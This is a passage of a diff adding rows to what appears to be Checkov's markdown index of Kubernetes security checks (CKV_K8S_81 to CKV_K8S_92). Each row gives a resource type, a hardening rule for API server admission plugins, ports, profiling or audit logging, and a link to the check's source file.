+| 3263 | CKV_K8S_81               | resource                         | StatefulSet                                                                                      | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used                                                                                                     | Kubernetes              | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py)                                                          |
+| 3264 | CKV_K8S_82               | resource                         | CronJob                                                                                          | Ensure that the admission control plugin ServiceAccount is set                                                                                                                                           | Kubernetes              | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py)                                                                    |
+| 3265 | CKV_K8S_82               | resource                         | DaemonSet                                                                                        | Ensure that the admission control plugin ServiceAccount is set                                                                                                                                           | Kubernetes              | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py)                                                                    |
+| 3266 | CKV_K8S_82               | resource                         | Deployment                                                                                       | Ensure that the admission control plugin ServiceAccount is set                                                                                                                                           | Kubernetes              | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py)                                                                    |
+| 3267 | CKV_K8S_82               | resource                         | DeploymentConfig                                                                                 | Ensure that the admission control plugin ServiceAccount is set                                                                                                                                           | Kubernetes              | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py)                                                                    |
+| 3268 | CKV_K8S_82               | resource                         | Job                                                                                              | Ensure that the admission control plugin ServiceAccount is set                                                                                                                                           | Kubernetes              | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py)                                                                    |
+| 3269 | CKV_K8S_82               | resource                         | Pod                                                                                              | Ensure that the admission control plugin ServiceAccount is set                                                                                                                                           | Kubernetes              | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py)                                                                    |
+| 3270 | CKV_K8S_82               | resource                         | PodTemplate                                                                                      | Ensure that the admission control plugin ServiceAccount is set                                                                                                                                           | Kubernetes              | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py)                                                                    |
+| 3271 | CKV_K8S_82               | resource                         | ReplicaSet                                                                                       | Ensure that the admission control plugin ServiceAccount is set                                                                                                                                           | Kubernetes              | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py)                                                                    |
+| 3272 | CKV_K8S_82               | resource                         | ReplicationController                                                                            | Ensure that the admission control plugin ServiceAccount is set                                                                                                                                           | Kubernetes              | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py)                                                                    |
+| 3273 | CKV_K8S_82               | resource                         | StatefulSet                                                                                      | Ensure that the admission control plugin ServiceAccount is set                                                                                                                                           | Kubernetes              | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py)                                                                    |
+| 3274 | CKV_K8S_83               | resource                         | CronJob                                                                                          | Ensure that the admission control plugin NamespaceLifecycle is set                                                                                                                                       | Kubernetes              | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py)                                                            |
+| 3275 | CKV_K8S_83               | resource                         | DaemonSet                                                                                        | Ensure that the admission control plugin NamespaceLifecycle is set                                                                                                                                       | Kubernetes              | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py)                                                            |
+| 3276 | CKV_K8S_83               | resource                         | Deployment                                                                                       | Ensure that the admission control plugin NamespaceLifecycle is set                                                                                                                                       | Kubernetes              | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py)                                                            |
+| 3277 | CKV_K8S_83               | resource                         | DeploymentConfig                                                                                 | Ensure that the admission control plugin NamespaceLifecycle is set                                                                                                                                       | Kubernetes              | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py)                                                            |
+| 3278 | CKV_K8S_83               | resource                         | Job                                                                                              | Ensure that the admission control plugin NamespaceLifecycle is set                                                                                                                                       | Kubernetes              | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py)                                                            |
+| 3279 | CKV_K8S_83               | resource                         | Pod                                                                                              | Ensure that the admission control plugin NamespaceLifecycle is set                                                                                                                                       | Kubernetes              | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py)                                                            |
+| 3280 | CKV_K8S_83               | resource                         | PodTemplate                                                                                      | Ensure that the admission control plugin NamespaceLifecycle is set                                                                                                                                       | Kubernetes              | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py)                                                            |
+| 3281 | CKV_K8S_83               | resource                         | ReplicaSet                                                                                       | Ensure that the admission control plugin NamespaceLifecycle is set                                                                                                                                       | Kubernetes              | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py)                                                            |
+| 3282 | CKV_K8S_83               | resource                         | ReplicationController                                                                            | Ensure that the admission control plugin NamespaceLifecycle is set                                                                                                                                       | Kubernetes              | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py)                                                            |
+| 3283 | CKV_K8S_83               | resource                         | StatefulSet                                                                                      | Ensure that the admission control plugin NamespaceLifecycle is set                                                                                                                                       | Kubernetes              | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py)                                                            |
+| 3284 | CKV_K8S_84               | resource                         | CronJob                                                                                          | Ensure that the admission control plugin PodSecurityPolicy is set                                                                                                                                        | Kubernetes              | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py)                                                              |
+| 3285 | CKV_K8S_84               | resource                         | DaemonSet                                                                                        | Ensure that the admission control plugin PodSecurityPolicy is set                                                                                                                                        | Kubernetes              | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py)                                                              |
+| 3286 | CKV_K8S_84               | resource                         | Deployment                                                                                       | Ensure that the admission control plugin PodSecurityPolicy is set                                                                                                                                        | Kubernetes              | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py)                                                              |
+| 3287 | CKV_K8S_84               | resource                         | DeploymentConfig                                                                                 | Ensure that the admission control plugin PodSecurityPolicy is set                                                                                                                                        | Kubernetes              | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py)                                                              |
+| 3288 | CKV_K8S_84               | resource                         | Job                                                                                              | Ensure that the admission control plugin PodSecurityPolicy is set                                                                                                                                        | Kubernetes              | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py)                                                              |
+| 3289 | CKV_K8S_84               | resource                         | Pod                                                                                              | Ensure that the admission control plugin PodSecurityPolicy is set                                                                                                                                        | Kubernetes              | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py)                                                              |
+| 3290 | CKV_K8S_84               | resource                         | PodTemplate                                                                                      | Ensure that the admission control plugin PodSecurityPolicy is set                                                                                                                                        | Kubernetes              | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py)                                                              |
+| 3291 | CKV_K8S_84               | resource                         | ReplicaSet                                                                                       | Ensure that the admission control plugin PodSecurityPolicy is set                                                                                                                                        | Kubernetes              | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py)                                                              |
+| 3292 | CKV_K8S_84               | resource                         | ReplicationController                                                                            | Ensure that the admission control plugin PodSecurityPolicy is set                                                                                                                                        | Kubernetes              | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py)                                                              |
+| 3293 | CKV_K8S_84               | resource                         | StatefulSet                                                                                      | Ensure that the admission control plugin PodSecurityPolicy is set                                                                                                                                        | Kubernetes              | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py)                                                              |
+| 3294 | CKV_K8S_85               | resource                         | CronJob                                                                                          | Ensure that the admission control plugin NodeRestriction is set                                                                                                                                          | Kubernetes              | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py)                                                                  |
+| 3295 | CKV_K8S_85               | resource                         | DaemonSet                                                                                        | Ensure that the admission control plugin NodeRestriction is set                                                                                                                                          | Kubernetes              | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py)                                                                  |
+| 3296 | CKV_K8S_85               | resource                         | Deployment                                                                                       | Ensure that the admission control plugin NodeRestriction is set                                                                                                                                          | Kubernetes              | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py)                                                                  |
+| 3297 | CKV_K8S_85               | resource                         | DeploymentConfig                                                                                 | Ensure that the admission control plugin NodeRestriction is set                                                                                                                                          | Kubernetes              | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py)                                                                  |
+| 3298 | CKV_K8S_85               | resource                         | Job                                                                                              | Ensure that the admission control plugin NodeRestriction is set                                                                                                                                          | Kubernetes              | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py)                                                                  |
+| 3299 | CKV_K8S_85               | resource                         | Pod                                                                                              | Ensure that the admission control plugin NodeRestriction is set                                                                                                                                          | Kubernetes              | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py)                                                                  |
+| 3300 | CKV_K8S_85               | resource                         | PodTemplate                                                                                      | Ensure that the admission control plugin NodeRestriction is set                                                                                                                                          | Kubernetes              | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py)                                                                  |
+| 3301 | CKV_K8S_85               | resource                         | ReplicaSet                                                                                       | Ensure that the admission control plugin NodeRestriction is set                                                                                                                                          | Kubernetes              | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py)                                                                  |
+| 3302 | CKV_K8S_85               | resource                         | ReplicationController                                                                            | Ensure that the admission control plugin NodeRestriction is set                                                                                                                                          | Kubernetes              | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py)                                                                  |
+| 3303 | CKV_K8S_85               | resource                         | StatefulSet                                                                                      | Ensure that the admission control plugin NodeRestriction is set                                                                                                                                          | Kubernetes              | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py)                                                                  |
+| 3304 | CKV_K8S_86               | resource                         | CronJob                                                                                          | Ensure that the --insecure-bind-address argument is not set                                                                                                                                              | Kubernetes              | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py)                                                                      |
+| 3305 | CKV_K8S_86               | resource                         | DaemonSet                                                                                        | Ensure that the --insecure-bind-address argument is not set                                                                                                                                              | Kubernetes              | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py)                                                                      |
+| 3306 | CKV_K8S_86               | resource                         | Deployment                                                                                       | Ensure that the --insecure-bind-address argument is not set                                                                                                                                              | Kubernetes              | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py)                                                                      |
+| 3307 | CKV_K8S_86               | resource                         | DeploymentConfig                                                                                 | Ensure that the --insecure-bind-address argument is not set                                                                                                                                              | Kubernetes              | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py)                                                                      |
+| 3308 | CKV_K8S_86               | resource                         | Job                                                                                              | Ensure that the --insecure-bind-address argument is not set                                                                                                                                              | Kubernetes              | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py)                                                                      |
+| 3309 | CKV_K8S_86               | resource                         | Pod                                                                                              | Ensure that the --insecure-bind-address argument is not set                                                                                                                                              | Kubernetes              | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py)                                                                      |
+| 3310 | CKV_K8S_86               | resource                         | PodTemplate                                                                                      | Ensure that the --insecure-bind-address argument is not set                                                                                                                                              | Kubernetes              | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py)                                                                      |
+| 3311 | CKV_K8S_86               | resource                         | ReplicaSet                                                                                       | Ensure that the --insecure-bind-address argument is not set                                                                                                                                              | Kubernetes              | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py)                                                                      |
+| 3312 | CKV_K8S_86               | resource                         | ReplicationController                                                                            | Ensure that the --insecure-bind-address argument is not set                                                                                                                                              | Kubernetes              | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py)                                                                      |
+| 3313 | CKV_K8S_86               | resource                         | StatefulSet                                                                                      | Ensure that the --insecure-bind-address argument is not set                                                                                                                                              | Kubernetes              | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py)                                                                      |
+| 3314 | CKV_K8S_88               | resource                         | CronJob                                                                                          | Ensure that the --insecure-port argument is set to 0                                                                                                                                                     | Kubernetes              | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py)                                                                                    |
+| 3315 | CKV_K8S_88               | resource                         | DaemonSet                                                                                        | Ensure that the --insecure-port argument is set to 0                                                                                                                                                     | Kubernetes              | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py)                                                                                    |
+| 3316 | CKV_K8S_88               | resource                         | Deployment                                                                                       | Ensure that the --insecure-port argument is set to 0                                                                                                                                                     | Kubernetes              | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py)                                                                                    |
+| 3317 | CKV_K8S_88               | resource                         | DeploymentConfig                                                                                 | Ensure that the --insecure-port argument is set to 0                                                                                                                                                     | Kubernetes              | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py)                                                                                    |
+| 3318 | CKV_K8S_88               | resource                         | Job                                                                                              | Ensure that the --insecure-port argument is set to 0                                                                                                                                                     | Kubernetes              | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py)                                                                                    |
+| 3319 | CKV_K8S_88               | resource                         | Pod                                                                                              | Ensure that the --insecure-port argument is set to 0                                                                                                                                                     | Kubernetes              | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py)                                                                                    |
+| 3320 | CKV_K8S_88               | resource                         | PodTemplate                                                                                      | Ensure that the --insecure-port argument is set to 0                                                                                                                                                     | Kubernetes              | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py)                                                                                    |
+| 3321 | CKV_K8S_88               | resource                         | ReplicaSet                                                                                       | Ensure that the --insecure-port argument is set to 0                                                                                                                                                     | Kubernetes              | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py)                                                                                    |
+| 3322 | CKV_K8S_88               | resource                         | ReplicationController                                                                            | Ensure that the --insecure-port argument is set to 0                                                                                                                                                     | Kubernetes              | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py)                                                                                    |
+| 3323 | CKV_K8S_88               | resource                         | StatefulSet                                                                                      | Ensure that the --insecure-port argument is set to 0                                                                                                                                                     | Kubernetes              | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py)                                                                                    |
+| 3324 | CKV_K8S_89               | resource                         | CronJob                                                                                          | Ensure that the --secure-port argument is not set to 0                                                                                                                                                   | Kubernetes              | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py)                                                                                        |
+| 3325 | CKV_K8S_89               | resource                         | DaemonSet                                                                                        | Ensure that the --secure-port argument is not set to 0                                                                                                                                                   | Kubernetes              | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py)                                                                                        |
+| 3326 | CKV_K8S_89               | resource                         | Deployment                                                                                       | Ensure that the --secure-port argument is not set to 0                                                                                                                                                   | Kubernetes              | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py)                                                                                        |
+| 3327 | CKV_K8S_89               | resource                         | DeploymentConfig                                                                                 | Ensure that the --secure-port argument is not set to 0                                                                                                                                                   | Kubernetes              | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py)                                                                                        |
+| 3328 | CKV_K8S_89               | resource                         | Job                                                                                              | Ensure that the --secure-port argument is not set to 0                                                                                                                                                   | Kubernetes              | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py)                                                                                        |
+| 3329 | CKV_K8S_89               | resource                         | Pod                                                                                              | Ensure that the --secure-port argument is not set to 0                                                                                                                                                   | Kubernetes              | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py)                                                                                        |
+| 3330 | CKV_K8S_89               | resource                         | PodTemplate                                                                                      | Ensure that the --secure-port argument is not set to 0                                                                                                                                                   | Kubernetes              | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py)                                                                                        |
+| 3331 | CKV_K8S_89               | resource                         | ReplicaSet                                                                                       | Ensure that the --secure-port argument is not set to 0                                                                                                                                                   | Kubernetes              | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py)                                                                                        |
+| 3332 | CKV_K8S_89               | resource                         | ReplicationController                                                                            | Ensure that the --secure-port argument is not set to 0                                                                                                                                                   | Kubernetes              | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py)                                                                                        |
+| 3333 | CKV_K8S_89               | resource                         | StatefulSet                                                                                      | Ensure that the --secure-port argument is not set to 0                                                                                                                                                   | Kubernetes              | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py)                                                                                        |
+| 3334 | CKV_K8S_90               | resource                         | CronJob                                                                                          | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py)                                                                                          |
+| 3335 | CKV_K8S_90               | resource                         | DaemonSet                                                                                        | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py)                                                                                          |
+| 3336 | CKV_K8S_90               | resource                         | Deployment                                                                                       | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py)                                                                                          |
+| 3337 | CKV_K8S_90               | resource                         | DeploymentConfig                                                                                 | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py)                                                                                          |
+| 3338 | CKV_K8S_90               | resource                         | Job                                                                                              | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py)                                                                                          |
+| 3339 | CKV_K8S_90               | resource                         | Pod                                                                                              | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py)                                                                                          |
+| 3340 | CKV_K8S_90               | resource                         | PodTemplate                                                                                      | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py)                                                                                          |
+| 3341 | CKV_K8S_90               | resource                         | ReplicaSet                                                                                       | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py)                                                                                          |
+| 3342 | CKV_K8S_90               | resource                         | ReplicationController                                                                            | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py)                                                                                          |
+| 3343 | CKV_K8S_90               | resource                         | StatefulSet                                                                                      | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py)                                                                                          |
+| 3344 | CKV_K8S_91               | resource                         | CronJob                                                                                          | Ensure that the --audit-log-path argument is set                                                                                                                                                         | Kubernetes              | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py)                                                                                            |
+| 3345 | CKV_K8S_91               | resource                         | DaemonSet                                                                                        | Ensure that the --audit-log-path argument is set                                                                                                                                                         | Kubernetes              | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py)                                                                                            |
+| 3346 | CKV_K8S_91               | resource                         | Deployment                                                                                       | Ensure that the --audit-log-path argument is set                                                                                                                                                         | Kubernetes              | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py)                                                                                            |
+| 3347 | CKV_K8S_91               | resource                         | DeploymentConfig                                                                                 | Ensure that the --audit-log-path argument is set                                                                                                                                                         | Kubernetes              | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py)                                                                                            |
+| 3348 | CKV_K8S_91               | resource                         | Job                                                                                              | Ensure that the --audit-log-path argument is set                                                                                                                                                         | Kubernetes              | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py)                                                                                            |
+| 3349 | CKV_K8S_91               | resource                         | Pod                                                                                              | Ensure that the --audit-log-path argument is set                                                                                                                                                         | Kubernetes              | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py)                                                                                            |
+| 3350 | CKV_K8S_91               | resource                         | PodTemplate                                                                                      | Ensure that the --audit-log-path argument is set                                                                                                                                                         | Kubernetes              | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py)                                                                                            |
+| 3351 | CKV_K8S_91               | resource                         | ReplicaSet                                                                                       | Ensure that the --audit-log-path argument is set                                                                                                                                                         | Kubernetes              | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py)                                                                                            |
+| 3352 | CKV_K8S_91               | resource                         | ReplicationController                                                                            | Ensure that the --audit-log-path argument is set                                                                                                                                                         | Kubernetes              | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py)                                                                                            |
+| 3353 | CKV_K8S_91               | resource                         | StatefulSet                                                                                      | Ensure that the --audit-log-path argument is set                                                                                                                                                         | Kubernetes              | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py)                                                                                            |
+| 3354 | CKV_K8S_92               | resource                         | CronJob                                                                                          | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate                                                                                                                               | Kubernetes              | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py)                                                                                |
+| 3355 | CKV_K8S_92               | resource                         | DaemonSet                                                                                        | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate                                                                                                                               | Kubernetes              | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py)                                                                                |
+| 3356 | CKV_K8S_92               | resource                         | Deployment                                                                                       | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate                                                                                                                               | Kubernetes              | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py)                                                                                |
